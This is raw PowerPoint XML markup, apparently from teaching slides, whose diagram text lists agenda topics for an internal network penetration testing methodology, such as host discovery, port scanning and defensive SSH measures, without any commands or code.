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1" r:id="rId1"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId37"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="277" r:id="rId3"/>
    <p:sldId id="260" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="282" r:id="rId7"/>
    <p:sldId id="283" r:id="rId8"/>
    <p:sldId id="285" r:id="rId9"/>
    <p:sldId id="287" r:id="rId10"/>
    <p:sldId id="289" r:id="rId11"/>
    <p:sldId id="290" r:id="rId12"/>
    <p:sldId id="291" r:id="rId13"/>
    <p:sldId id="292" r:id="rId14"/>
    <p:sldId id="284" r:id="rId15"/>
    <p:sldId id="281" r:id="rId16"/>
    <p:sldId id="273" r:id="rId17"/>
    <p:sldId id="274" r:id="rId18"/>
    <p:sldId id="275" r:id="rId19"/>
    <p:sldId id="276" r:id="rId20"/>
    <p:sldId id="295" r:id="rId21"/>
    <p:sldId id="296" r:id="rId22"/>
    <p:sldId id="298" r:id="rId23"/>
    <p:sldId id="297" r:id="rId24"/>
    <p:sldId id="302" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="294" r:id="rId27"/>
    <p:sldId id="303" r:id="rId28"/>
    <p:sldId id="266" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="278" r:id="rId31"/>
    <p:sldId id="279" r:id="rId32"/>
    <p:sldId id="271" r:id="rId33"/>
    <p:sldId id="267" r:id="rId34"/>
    <p:sldId id="299" r:id="rId35"/>
    <p:sldId id="30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673" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="123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D82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/default" loCatId="list" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/colorful2" csCatId="colorful"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DAA80C2B-B9E1-4905-88E8-8C09288E5FE5}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Internal Network Penetration Testing Methodology</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{911226C4-3C79-4677-A13A-7C7F53CF73BD}" type="parTrans" cxnId="{EEC845E0-C216-4A6E-84E6-E6312A097386}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4C4AC163-A8B5-4942-9BC7-82259C2DFDE1}" type="sibTrans" cxnId="{EEC845E0-C216-4A6E-84E6-E6312A097386}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{86C83D93-40EB-485D-B9D8-D8165B1904DD}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB" dirty="0"/>
            <a:t>Purpose of Internal Network Penetration Testing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{44BA50A9-4838-4BE4-AEFB-DBE7F874775E}" type="parTrans" cxnId="{D2889FA6-831C-481F-9758-1A845122DF4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{167C434D-92D2-4BDE-845C-8A45A15D258E}" type="sibTrans" cxnId="{D2889FA6-831C-481F-9758-1A845122DF4F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{36541D3B-7E7A-451B-99D2-3CF23C79B997}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Key Considerations of Internal Testing</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FB04445E-B3BA-44D8-9868-182D1B91360C}" type="parTrans" cxnId="{16453C76-B777-40DF-B2FE-064558B03BE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{22061C7B-DB31-4BEA-B286-A262493B423E}" type="sibTrans" cxnId="{16453C76-B777-40DF-B2FE-064558B03BE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{228F1E79-1835-40FE-938D-3825A662F41A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Exposing the Internal Network/Secondary Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9F7A767F-D2CB-44F8-BC8E-083A067E814B}" type="parTrans" cxnId="{F3AD6116-B1AA-49FE-82F1-E935E1E80197}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C10D272E-346C-4EC2-B3B5-8DC1672F6996}" type="sibTrans" cxnId="{F3AD6116-B1AA-49FE-82F1-E935E1E80197}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1B01B04B-E79D-4708-A8C5-022CC7C21A3A}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Defensive SSH Measures</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3E305EA5-0A97-40F6-BD39-762E4A0B8D9B}" type="parTrans" cxnId="{06F88ED8-A6E6-43D2-B5B2-A91B1BDA8CB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FE8FE8FD-9459-4AC5-9BE9-2CC8BE362A0B}" type="sibTrans" cxnId="{06F88ED8-A6E6-43D2-B5B2-A91B1BDA8CB0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6479805F-89D9-4680-8E98-35468E07F201}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Host Discovery Methods</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{91439B48-1C68-4365-863C-489CA3C021E7}" type="parTrans" cxnId="{F7A21851-A6B8-4B2F-B1B5-98A4818DF8BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E76930EB-420A-436B-B516-B7AB7DC9B877}" type="sibTrans" cxnId="{F7A21851-A6B8-4B2F-B1B5-98A4818DF8BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F218F24-C7CE-43C1-A91F-BFE0E5912CF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Port Scanning (Internal Network)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{45CA75D3-51F7-4CA0-9A62-178A354B7AEF}" type="parTrans" cxnId="{65E51E47-CBA3-409D-BE2A-8CE2F862CCE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{630211DF-22E4-44DD-83AB-DB9E8A8D4859}" type="sibTrans" cxnId="{65E51E47-CBA3-409D-BE2A-8CE2F862CCE0}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{E6FEEA45-70D9-48EB-A98D-A637BE93A3D4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-GB"/>
            <a:t>Enumerating firewalled services</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{93EB137E-659C-4106-B5D6-C7305604F7F3}" type="parTrans" cxnId="{80222C89-7325-4251-A3E0-1C376D35FF39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F4D69089-67CA-4AB0-9296-943F8E4C229D}" type="sibTrans" cxnId="{80222C89-7325-4251-A3E0-1C376D35FF39}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{871E3665-4611-493D-B419-F76BED3403EA}" type="pres">
      <dgm:prSet presAssocID="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" presName="diagram" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F9FBBAB-71C3-4C1B-A5C8-657FA4CDF1B1}" type="pres">
      <dgm:prSet presAssocID="{DAA80C2B-B9E1-4905-88E8-8C09288E5FE5}" presName="node" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2A5DB4E3-66AD-4F32-B0B2-724C323C7B2E}" type="pres">
      <dgm:prSet presAssocID="{4C4AC163-A8B5-4942-9BC7-82259C2DFDE1}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{CD20B7AA-74C6-4804-84AE-019724EDA9CD}" type="pres">
      <dgm:prSet presAssocID="{86C83D93-40EB-485D-B9D8-D8165B1904DD}" presName="node" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{3B5E2EC4-A8AF-4C6D-ACFE-9BB19B812521}" type="pres">
      <dgm:prSet presAssocID="{167C434D-92D2-4BDE-845C-8A45A15D258E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1CF55B01-8050-4690-8477-6A0424D26789}" type="pres">
      <dgm:prSet presAssocID="{36541D3B-7E7A-451B-99D2-3CF23C79B997}" presName="node" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E8291756-3F8E-474F-A590-9665117CA043}" type="pres">
      <dgm:prSet presAssocID="{22061C7B-DB31-4BEA-B286-A262493B423E}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{8F4488FB-2CBB-410F-84B2-4F8CFD8620BA}" type="pres">
      <dgm:prSet presAssocID="{228F1E79-1835-40FE-938D-3825A662F41A}" presName="node" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{C7AAFC45-D0C6-42E5-89EC-5A600968AFAF}" type="pres">
      <dgm:prSet presAssocID="{C10D272E-346C-4EC2-B3B5-8DC1672F6996}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{17857C2A-DC42-4822-9943-4E949A48B699}" type="pres">
      <dgm:prSet presAssocID="{1B01B04B-E79D-4708-A8C5-022CC7C21A3A}" presName="node" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{21071C90-59CE-4F92-8A19-71C19E514597}" type="pres">
      <dgm:prSet presAssocID="{FE8FE8FD-9459-4AC5-9BE9-2CC8BE362A0B}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{26DB0420-CE37-4AF8-968A-3F3B5D799DE4}" type="pres">
      <dgm:prSet presAssocID="{6479805F-89D9-4680-8E98-35468E07F201}" presName="node" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{07B1761D-AD85-4FC8-83C5-5BCB499380D3}" type="pres">
      <dgm:prSet presAssocID="{E76930EB-420A-436B-B516-B7AB7DC9B877}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{1CE5B2BB-B647-4C52-B7E2-E44F252552BF}" type="pres">
      <dgm:prSet presAssocID="{5F218F24-C7CE-43C1-A91F-BFE0E5912CF4}" presName="node" presStyleLbl="node1" presStyleIdx="6" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{E565EB77-0023-46DC-A95D-5E7F278398DA}" type="pres">
      <dgm:prSet presAssocID="{630211DF-22E4-44DD-83AB-DB9E8A8D4859}" presName="sibTrans" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{69A34115-9DF9-48F1-B644-8C9E7BABE926}" type="pres">
      <dgm:prSet presAssocID="{E6FEEA45-70D9-48EB-A98D-A637BE93A3D4}" presName="node" presStyleLbl="node1" presStyleIdx="7" presStyleCnt="8">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{F3AD6116-B1AA-49FE-82F1-E935E1E80197}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{228F1E79-1835-40FE-938D-3825A662F41A}" srcOrd="3" destOrd="0" parTransId="{9F7A767F-D2CB-44F8-BC8E-083A067E814B}" sibTransId="{C10D272E-346C-4EC2-B3B5-8DC1672F6996}"/>
    <dgm:cxn modelId="{16C10119-0148-4F39-880C-260156468BB4}" type="presOf" srcId="{86C83D93-40EB-485D-B9D8-D8165B1904DD}" destId="{CD20B7AA-74C6-4804-84AE-019724EDA9CD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{8D2EFA2C-D2B9-4C9C-9734-3B6EBCF436A9}" type="presOf" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{871E3665-4611-493D-B419-F76BED3403EA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E1052430-CC27-4E62-BE3D-FFED940239E1}" type="presOf" srcId="{E6FEEA45-70D9-48EB-A98D-A637BE93A3D4}" destId="{69A34115-9DF9-48F1-B644-8C9E7BABE926}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{AA7FD463-AC07-4760-87DD-D05389B6FE6B}" type="presOf" srcId="{228F1E79-1835-40FE-938D-3825A662F41A}" destId="{8F4488FB-2CBB-410F-84B2-4F8CFD8620BA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{65E51E47-CBA3-409D-BE2A-8CE2F862CCE0}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{5F218F24-C7CE-43C1-A91F-BFE0E5912CF4}" srcOrd="6" destOrd="0" parTransId="{45CA75D3-51F7-4CA0-9A62-178A354B7AEF}" sibTransId="{630211DF-22E4-44DD-83AB-DB9E8A8D4859}"/>
    <dgm:cxn modelId="{A1446770-B38C-42F6-8CA8-3B8058D51332}" type="presOf" srcId="{36541D3B-7E7A-451B-99D2-3CF23C79B997}" destId="{1CF55B01-8050-4690-8477-6A0424D26789}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F7A21851-A6B8-4B2F-B1B5-98A4818DF8BB}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{6479805F-89D9-4680-8E98-35468E07F201}" srcOrd="5" destOrd="0" parTransId="{91439B48-1C68-4365-863C-489CA3C021E7}" sibTransId="{E76930EB-420A-436B-B516-B7AB7DC9B877}"/>
    <dgm:cxn modelId="{55377571-3559-4539-8B04-133DC21E518D}" type="presOf" srcId="{6479805F-89D9-4680-8E98-35468E07F201}" destId="{26DB0420-CE37-4AF8-968A-3F3B5D799DE4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{16453C76-B777-40DF-B2FE-064558B03BE0}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{36541D3B-7E7A-451B-99D2-3CF23C79B997}" srcOrd="2" destOrd="0" parTransId="{FB04445E-B3BA-44D8-9868-182D1B91360C}" sibTransId="{22061C7B-DB31-4BEA-B286-A262493B423E}"/>
    <dgm:cxn modelId="{A0598980-27A1-4012-9A80-1226F9205E17}" type="presOf" srcId="{DAA80C2B-B9E1-4905-88E8-8C09288E5FE5}" destId="{8F9FBBAB-71C3-4C1B-A5C8-657FA4CDF1B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{80222C89-7325-4251-A3E0-1C376D35FF39}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{E6FEEA45-70D9-48EB-A98D-A637BE93A3D4}" srcOrd="7" destOrd="0" parTransId="{93EB137E-659C-4106-B5D6-C7305604F7F3}" sibTransId="{F4D69089-67CA-4AB0-9296-943F8E4C229D}"/>
    <dgm:cxn modelId="{1B923998-D16B-44F3-BBFF-D10BF2D102AA}" type="presOf" srcId="{1B01B04B-E79D-4708-A8C5-022CC7C21A3A}" destId="{17857C2A-DC42-4822-9943-4E949A48B699}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{D2889FA6-831C-481F-9758-1A845122DF4F}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{86C83D93-40EB-485D-B9D8-D8165B1904DD}" srcOrd="1" destOrd="0" parTransId="{44BA50A9-4838-4BE4-AEFB-DBE7F874775E}" sibTransId="{167C434D-92D2-4BDE-845C-8A45A15D258E}"/>
    <dgm:cxn modelId="{EEECB6C4-EAC7-4F58-8576-B4838A3FF858}" type="presOf" srcId="{5F218F24-C7CE-43C1-A91F-BFE0E5912CF4}" destId="{1CE5B2BB-B647-4C52-B7E2-E44F252552BF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{06F88ED8-A6E6-43D2-B5B2-A91B1BDA8CB0}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{1B01B04B-E79D-4708-A8C5-022CC7C21A3A}" srcOrd="4" destOrd="0" parTransId="{3E305EA5-0A97-40F6-BD39-762E4A0B8D9B}" sibTransId="{FE8FE8FD-9459-4AC5-9BE9-2CC8BE362A0B}"/>
    <dgm:cxn modelId="{EEC845E0-C216-4A6E-84E6-E6312A097386}" srcId="{BDD82CC6-82EB-475B-8D5C-BEAD3E0AAA3C}" destId="{DAA80C2B-B9E1-4905-88E8-8C09288E5FE5}" srcOrd="0" destOrd="0" parTransId="{911226C4-3C79-4677-A13A-7C7F53CF73BD}" sibTransId="{4C4AC163-A8B5-4942-9BC7-82259C2DFDE1}"/>
    <dgm:cxn modelId="{8E8378BF-0CD6-4C61-816A-C8142DF73240}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{8F9FBBAB-71C3-4C1B-A5C8-657FA4CDF1B1}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{47BA5DF7-5C78-4A02-8CBE-FE48CD78DFFC}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{2A5DB4E3-66AD-4F32-B0B2-724C323C7B2E}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{A8E76B67-D88A-47BA-9C33-E7B9FA76D03B}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{CD20B7AA-74C6-4804-84AE-019724EDA9CD}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9B46265C-2B61-4F5F-B753-A535B4402E27}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{3B5E2EC4-A8AF-4C6D-ACFE-9BB19B812521}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{E083C678-D397-480E-980D-3A78C0A765A7}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{1CF55B01-8050-4690-8477-6A0424D26789}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{424430F7-A590-4F42-ABE6-FFF3DDE5B3CF}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{E8291756-3F8E-474F-A590-9665117CA043}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{10DD6C6B-36F4-48F2-AD97-57EFFDEC1557}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{8F4488FB-2CBB-410F-84B2-4F8CFD8620BA}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{830FA159-6DF3-45A6-ADCA-DFAA25B7BE2A}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{C7AAFC45-D0C6-42E5-89EC-5A600968AFAF}" srcOrd="7" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{9A44CCC4-1032-4434-9091-13A2558C56B2}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{17857C2A-DC42-4822-9943-4E949A48B699}" srcOrd="8" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F704BA99-E05C-4CCB-99B9-1B398FBC696B}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{21071C90-59CE-4F92-8A19-71C19E514597}" srcOrd="9" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{AE4152B7-9158-4A0F-B197-B1EFD1F6D14F}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{26DB0420-CE37-4AF8-968A-3F3B5D799DE4}" srcOrd="10" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{F75D481A-98F9-4F72-919A-0BE27DF0C4B9}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{07B1761D-AD85-4FC8-83C5-5BCB499380D3}" srcOrd="11" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{BFD2C377-EC23-41EC-B231-85CC473ED863}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{1CE5B2BB-B647-4C52-B7E2-E44F252552BF}" srcOrd="12" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{55DD2C62-591D-4661-B0CE-10D74A9CFC82}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{E565EB77-0023-46DC-A95D-5E7F278398DA}" srcOrd="13" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/default"/>
    <dgm:cxn modelId="{15CB8D5F-3050-410E-A774-A6C79AF2EE99}" type="presParOf" srcId="{871E3665-4611-493D-B419-F76BED3403EA}" destId="{69A34115-9DF9-48F1-B644-8C9E7BABE926}"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7055C0-55D4-4323-8816-EE2A09F153A2}" type="doc">
      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2016/7/layout/VerticalDownArrowProcess" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple4" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent4_2" csCatId="accent4" phldr="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B32A1EAF-FF8D-457B-898B-059F4925F381}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Make throwaway account</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8C8F84A6-6706-4638-B6B1-A6B1FD3A5CC9}" type="parTrans" cxnId="{5620A755-B279-4AA8-8673-490B354953C7}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
